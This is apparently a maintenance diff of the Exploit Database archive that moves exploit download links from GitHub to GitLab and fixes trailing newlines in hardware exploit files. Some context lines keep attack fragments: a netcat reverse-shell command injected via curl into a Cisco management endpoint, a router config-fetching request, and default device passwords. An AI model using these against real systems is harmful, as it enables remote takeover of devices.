4dd7d4bf3..26c8095c6 100644 --- a/exploits/hardware/dos/20821.txt +++ b/exploits/hardware/dos/20821.txt @@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20821.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20821.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt index e7bcc4dd5..1e31687e8 100644 --- a/exploits/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate This problem makes it possible for a remote user to deny service to legitimate users of the switch. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20824.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20824.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt index 493fed08b..d2a279ea4 100644 --- a/exploits/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21092.mrc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21092.mrc \ No newline at end of file diff --git a/exploits/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt index f7a29451a..ef987afe1 100644 --- a/exploits/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22596.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22596.zip \ No newline at end of file diff --git a/exploits/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt index 24042abb6..b1f0eb0d3 100644 --- a/exploits/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22978.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22978.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt index 6e791c628..62cbd1f3a 100644 --- a/exploits/hardware/dos/23876.txt +++ b/exploits/hardware/dos/23876.txt @@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23876.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23876.zip \ No newline at end of file diff --git a/exploits/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt index f22c3d4f9..907ca0bfb 100644 --- a/exploits/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib All versions of cdp are assumed to be vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23900.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23900.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt index c89f07957..6590ee307 100644 --- a/exploits/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28228.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28228.zip \ No newline at end of file diff --git a/exploits/hardware/dos/41806.txt b/exploits/hardware/dos/41806.txt index 19298a97a..ff2aaaa3f 100644 --- a/exploits/hardware/dos/41806.txt +++ b/exploits/hardware/dos/41806.txt @@ -72,4 +72,4 @@ I've been able to verify this vulnerability on the BCM4339 chip, running version Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41806.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41806.zip \ No newline at end of file diff --git a/exploits/hardware/dos/43119.py b/exploits/hardware/dos/43119.py index 04052e1df..f7458a517 100755 --- a/exploits/hardware/dos/43119.py +++ b/exploits/hardware/dos/43119.py @@ -51,4 +51,4 @@ while True: s.close() except: print("[!] Can't connect to target") - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/dos/43490.txt b/exploits/hardware/dos/43490.txt index 81e61520b..8c2e1497c 100644 --- a/exploits/hardware/dos/43490.txt +++ b/exploits/hardware/dos/43490.txt @@ -143,4 +143,4 @@ flushing would be necessary to make it work. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43490.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip \ No newline at end of file diff --git a/exploits/hardware/dos/44197.md b/exploits/hardware/dos/44197.md index 77f91e108..065358cf2 100644 --- a/exploits/hardware/dos/44197.md +++ b/exploits/hardware/dos/44197.md @@ -25,4 +25,4 @@ License MIT License. See attached `LICENSE.md` file. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44197.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44197.zip \ No newline at end of file diff --git a/exploits/hardware/dos/8013.txt b/exploits/hardware/dos/8013.txt index 03484012b..1da3012cf 100644 --- a/exploits/hardware/dos/8013.txt +++ b/exploits/hardware/dos/8013.txt @@ -27,7 +27,7 @@ POC/EXPLOIT you can open this url with the browser or send mms with this image. http://es.geocities.com/jplopezy/nokiacrash.jpg -alt: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8013.jpg (2009-nokiacrash.jpg) +alt: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8013.jpg (2009-nokiacrash.jpg) ------------------------------------------------------ Juan Pablo Lopez Yacubian diff --git a/exploits/hardware/local/21001.txt b/exploits/hardware/local/21001.txt index 338277631..b305caad1 100644 --- a/exploits/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia Since user-supplied data is written to the target file, attackers may be able to elevate privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21001.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21001.tar.gz \ No newline at end of file diff --git a/exploits/hardware/local/40271.txt b/exploits/hardware/local/40271.txt index bc2647796..ac5e58f62 100644 --- a/exploits/hardware/local/40271.txt +++ b/exploits/hardware/local/40271.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40271.zip \ No newline at end of file diff --git a/exploits/hardware/local/43397.md b/exploits/hardware/local/43397.md index 5bc386670..3062841b8 100644 --- a/exploits/hardware/local/43397.md +++ b/exploits/hardware/local/43397.md @@ -29,4 +29,4 @@ I was not alone in this exploit's development, and would like to thank those who - Anonymous -E-DB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43397.zip \ No newline at end of file +E-DB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43397.zip \ No newline at end of file diff --git a/exploits/hardware/local/44198.md b/exploits/hardware/local/44198.md index 48547181f..afa60c4d7 100644 --- a/exploits/hardware/local/44198.md +++ b/exploits/hardware/local/44198.md @@ -26,4 +26,4 @@ Credits ============== qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/). -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44198.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44198.zip \ No newline at end of file diff --git a/exploits/hardware/local/44200.md b/exploits/hardware/local/44200.md index e6984098f..31c30563c 100644 --- a/exploits/hardware/local/44200.md +++ b/exploits/hardware/local/44200.md @@ -18,4 +18,4 @@ Liang Chen thexyz dreadlyei -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44200.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44200.zip \ No newline at end of file diff --git a/exploits/hardware/local/44644.txt b/exploits/hardware/local/44644.txt index 7e9040c90..2baf06c5a 100644 --- a/exploits/hardware/local/44644.txt +++ b/exploits/hardware/local/44644.txt @@ -17,4 +17,4 @@ It is desired to find a way to invoke edge engine when console is offline Greets from unknownv2 & mon0 _ -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44644.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44644.zip \ No newline at end of file diff --git a/exploits/hardware/local/44818.md b/exploits/hardware/local/44818.md index d9667b6f9..4c998083e 100644 --- a/exploits/hardware/local/44818.md +++ b/exploits/hardware/local/44818.md @@ -5,7 +5,7 @@ In this project you will find a full implementation of the second "bpf" kernel e This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44818.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44818.zip ## Patches Included The following patches are made by default in the kernel ROP chain: diff --git a/exploits/hardware/local/44820.txt b/exploits/hardware/local/44820.txt index 3973cf14c..dde56930c 100644 --- a/exploits/hardware/local/44820.txt +++ b/exploits/hardware/local/44820.txt @@ -1,5 +1,5 @@ EDB Note ~ http://ps3xploit.com/help/dumper.html -EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip +EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip ## Dumper Help diff --git a/exploits/hardware/local/45785.md b/exploits/hardware/local/45785.md index 0d6ffc6b2..2131dd1a4 100644 --- a/exploits/hardware/local/45785.md +++ b/exploits/hardware/local/45785.md @@ -119,4 +119,4 @@ You can play around with one victim at a time in `sync.sh`. Sample output for th -EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip +EDB Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45785.zip \ No newline at end of file diff --git a/exploits/hardware/local/46522.md b/exploits/hardware/local/46522.md index f15b92b8d..5b544cabb 100644 --- a/exploits/hardware/local/46522.md +++ b/exploits/hardware/local/46522.md @@ -70,4 +70,4 @@ qwertyoruiop - WebKit School saelo - Phrack paper -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46522.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46522.zip \ No newline at end of file diff --git a/exploits/hardware/remote/12298.txt b/exploits/hardware/remote/12298.txt index e85ca0809..f27d65885 100644 --- a/exploits/hardware/remote/12298.txt +++ b/exploits/hardware/remote/12298.txt @@ -9,7 +9,7 @@ # V100R001B121Telmex # Exploit Download Link: # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) By sending a specially crafted UDP packet you can remotely obtain the diff --git a/exploits/hardware/remote/18291.txt b/exploits/hardware/remote/18291.txt index dbcf71fc0..e11aa693b 100644 --- a/exploits/hardware/remote/18291.txt +++ b/exploits/hardware/remote/18291.txt @@ -7,4 +7,4 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt index e41053062..8c40192a3 100644 --- a/exploits/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-2.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-3.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-2.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-3.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/2034.txt b/exploits/hardware/remote/2034.txt index 224d03196..16e8e457f 100644 --- a/exploits/hardware/remote/2034.txt +++ b/exploits/hardware/remote/2034.txt @@ -1,5 +1,5 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2034.tgz (07182006-btvoyager.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2034.tgz (07182006-btvoyager.tgz) # milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt index 387bdb79a..0ae59ba66 100644 --- a/exploits/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22532.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22532.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt index 06f355801..e04dda7e6 100644 --- a/exploits/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23212.tar.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23212.tar.bz2 \ No newline at end of file diff --git a/exploits/hardware/remote/28056.txt b/exploits/hardware/remote/28056.txt index a264ab6c9..0dc50a5e7 100644 --- a/exploits/hardware/remote/28056.txt +++ b/exploits/hardware/remote/28056.txt @@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28056.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28056.zip \ No newline at end of file diff --git a/exploits/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt index 3778b1ea8..b4f8e4fcb 100644 --- a/exploits/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31132.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31132.zip \ No newline at end of file diff --git a/exploits/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt index a8fef5f68..b3a06234a 100644 --- a/exploits/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4 Software Versions: V100R001B120Telmex, V100R001B121Telmex -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33869.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33869.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/34465.txt b/exploits/hardware/remote/34465.txt index b7d28b759..1a6d04ca9 100644 --- a/exploits/hardware/remote/34465.txt +++ b/exploits/hardware/remote/34465.txt @@ -1,4 +1,4 @@ When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. -Advisory: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34465.pdf \ No newline at end of file +Advisory: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34465.pdf \ No newline at end of file diff --git a/exploits/hardware/remote/39314.c b/exploits/hardware/remote/39314.c index 009402139..061407f78 100644 --- a/exploits/hardware/remote/39314.c +++ b/exploits/hardware/remote/39314.c @@ -34,4 +34,4 @@ curl -i -H "$PARM1" \ -H "$PARM4" \ -H "$PARM5" \ -H "$PARM6" \ - -H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg + -H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg \ No newline at end of file diff --git a/exploits/hardware/remote/39823.py b/exploits/hardware/remote/39823.py index fbbc159c0..02fd03c14 100755 --- a/exploits/hardware/remote/39823.py +++ b/exploits/hardware/remote/39823.py @@ -473,5 +473,4 @@ if __name__ == "__main__": sess1.send(packet) # Hopefully we'll get something interesting - exploit.interact() - + exploit.interact() \ No newline at end of file diff --git a/exploits/hardware/remote/40258.txt b/exploits/hardware/remote/40258.txt index 821a16e38..249c0c8fb 100644 --- a/exploits/hardware/remote/40258.txt +++ b/exploits/hardware/remote/40258.txt @@ -14,4 +14,4 @@ Requirements: Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40258.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40258.zip \ No newline at end of file diff --git a/exploits/hardware/remote/40275.txt b/exploits/hardware/remote/40275.txt index 32a9ebbd6..4e4b141bc 100644 --- a/exploits/hardware/remote/40275.txt +++ b/exploits/hardware/remote/40275.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40275.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40275.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41298.txt b/exploits/hardware/remote/41298.txt index 235bd0400..e6e726f4a 100644 --- a/exploits/hardware/remote/41298.txt +++ b/exploits/hardware/remote/41298.txt @@ -115,4 +115,4 @@ OPTIONS: -h, --help Print this message ` -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41298.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41805.txt b/exploits/hardware/remote/41805.txt index 5881794f9..00a49949f 100644 --- a/exploits/hardware/remote/41805.txt +++ b/exploits/hardware/remote/41805.txt @@ -130,4 +130,4 @@ BCMPatcher.tar.gz Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41805.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41805.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41808.txt b/exploits/hardware/remote/41808.txt index e5b304ad2..0569f5df9 100644 --- a/exploits/hardware/remote/41808.txt +++ b/exploits/hardware/remote/41808.txt @@ -57,4 +57,4 @@ This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41808.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41808.zip \ No newline at end of file diff --git a/exploits/hardware/remote/42726.py b/exploits/hardware/remote/42726.py index 4e754bed7..a20e5562f 100755 --- a/exploits/hardware/remote/42726.py +++ b/exploits/hardware/remote/42726.py @@ -124,4 +124,4 @@ while True: else: conn.send(cmd + "\n") receive(conn) -sock.close() +sock.close() \ No newline at end of file diff --git a/exploits/hardware/remote/42787.txt b/exploits/hardware/remote/42787.txt index a4b3eb570..c85e42045 100644 --- a/exploits/hardware/remote/42787.txt +++ b/exploits/hardware/remote/42787.txt @@ -51,4 +51,4 @@ root:indigo root:video default:video default:[blank] -ftp:video +ftp:video \ No newline at end of file diff --git a/exploits/hardware/remote/42888.sh b/exploits/hardware/remote/42888.sh index 9da72a437..71b7d28d4 100755 --- a/exploits/hardware/remote/42888.sh +++ b/exploits/hardware/remote/42888.sh @@ -25,4 +25,4 @@ BASH=$(encode "/bin/bash") COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" -curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" +curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" \ No newline at end of file diff --git a/exploits/hardware/remote/43061.txt b/exploits/hardware/remote/43061.txt index 5a7985d4d..011179f29 100644 --- a/exploits/hardware/remote/43061.txt +++ b/exploits/hardware/remote/43061.txt @@ -24,4 +24,4 @@ In some of the MitraStar routers there is a zyad1234 user with password zyad1234 Solution -------- In the latest firmware versions this have been fixed. -If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. +If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. \ No newline at end of file diff --git a/exploits/hardware/remote/43105.txt b/exploits/hardware/remote/43105.txt index bc57ebd2e..51b209847 100644 --- a/exploits/hardware/remote/43105.txt +++ b/exploits/hardware/remote/43105.txt @@ -36,6 +36,4 @@ root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo -Vendor Name: ZyXEL Communications Corp. - - +Vendor Name: ZyXEL Communications Corp. \ No newline at end of file diff --git a/exploits/hardware/remote/43118.txt b/exploits/hardware/remote/43118.txt index 1489100a2..dd0654aad 100644 --- a/exploits/hardware/remote/43118.txt +++ b/exploits/hardware/remote/43118.txt @@ -29,4 +29,4 @@ Password: CenturyL1nk # cat /proc/version Linux version 2.6.30 (waye@hugh-PowerEdge-R220.home) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015 # cat /etc/group - root::0:root,admin,support,user + root::0:root,admin,support,user \ No newline at end of file diff --git a/exploits/hardware/remote/44196.md b/exploits/hardware/remote/44196.md index 6a7724a4a..7032f1fc9 100644 --- a/exploits/hardware/remote/44196.md +++ b/exploits/hardware/remote/44196.md @@ -27,4 +27,4 @@ Massive credits to the following: - [Flatz](https://twitter.com/flat_z) - Anonymous -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44196-v2.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44196-v2.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44574.txt b/exploits/hardware/remote/44574.txt index 2b985af61..079f08d51 100644 --- a/exploits/hardware/remote/44574.txt +++ b/exploits/hardware/remote/44574.txt @@ -32,4 +32,4 @@ functions properly. $ ssh root@norton.core ``` -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44574.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44574.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44635.py b/exploits/hardware/remote/44635.py index 430808119..b906b6b4a 100755 --- a/exploits/hardware/remote/44635.py +++ b/exploits/hardware/remote/44635.py @@ -114,4 +114,4 @@ if __name__ == "__main__": print("Exploit and clean up failed!") sys.exit(1) - print("Exploitation complete") + print("Exploitation complete") \ No newline at end of file diff --git a/exploits/hardware/remote/46444.txt b/exploits/hardware/remote/46444.txt index 838f65da1..4259d6dc3 100644 --- a/exploits/hardware/remote/46444.txt +++ b/exploits/hardware/remote/46444.txt @@ -41,4 +41,4 @@ albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46444.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46444.zip \ No newline at end of file diff --git a/exploits/hardware/remote/47936.js b/exploits/hardware/remote/47936.js index dfa392fcc..50a749395 100644 --- a/exploits/hardware/remote/47936.js +++ b/exploits/hardware/remote/47936.js @@ -1,4 +1,4 @@ -// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip +// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47936.zip function buf2hex(buffer) { // buffer is an ArrayBuffer return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join(''); diff --git a/exploits/hardware/remote/50351.txt b/exploits/hardware/remote/50351.txt index ae2830de8..b90660ae6 100644 --- a/exploits/hardware/remote/50351.txt +++ b/exploits/hardware/remote/50351.txt @@ -1,10 +1,10 @@ -# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation +# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation # Date: 10-08-2021 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.mitrastar.com -# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) -# Tested on: Firmware BR_g3.5_100VNZ0b33 -# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md +# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) +# Tested on: Firmware BR_g3.5_100VNZ0b33 +# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md Description: diff --git a/exploits/hardware/remote/8269.txt b/exploits/hardware/remote/8269.txt index 65a043fde..bc21ede35 100644 --- a/exploits/hardware/remote/8269.txt +++ b/exploits/hardware/remote/8269.txt @@ -197,7 +197,7 @@ name="backdoor"> Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip 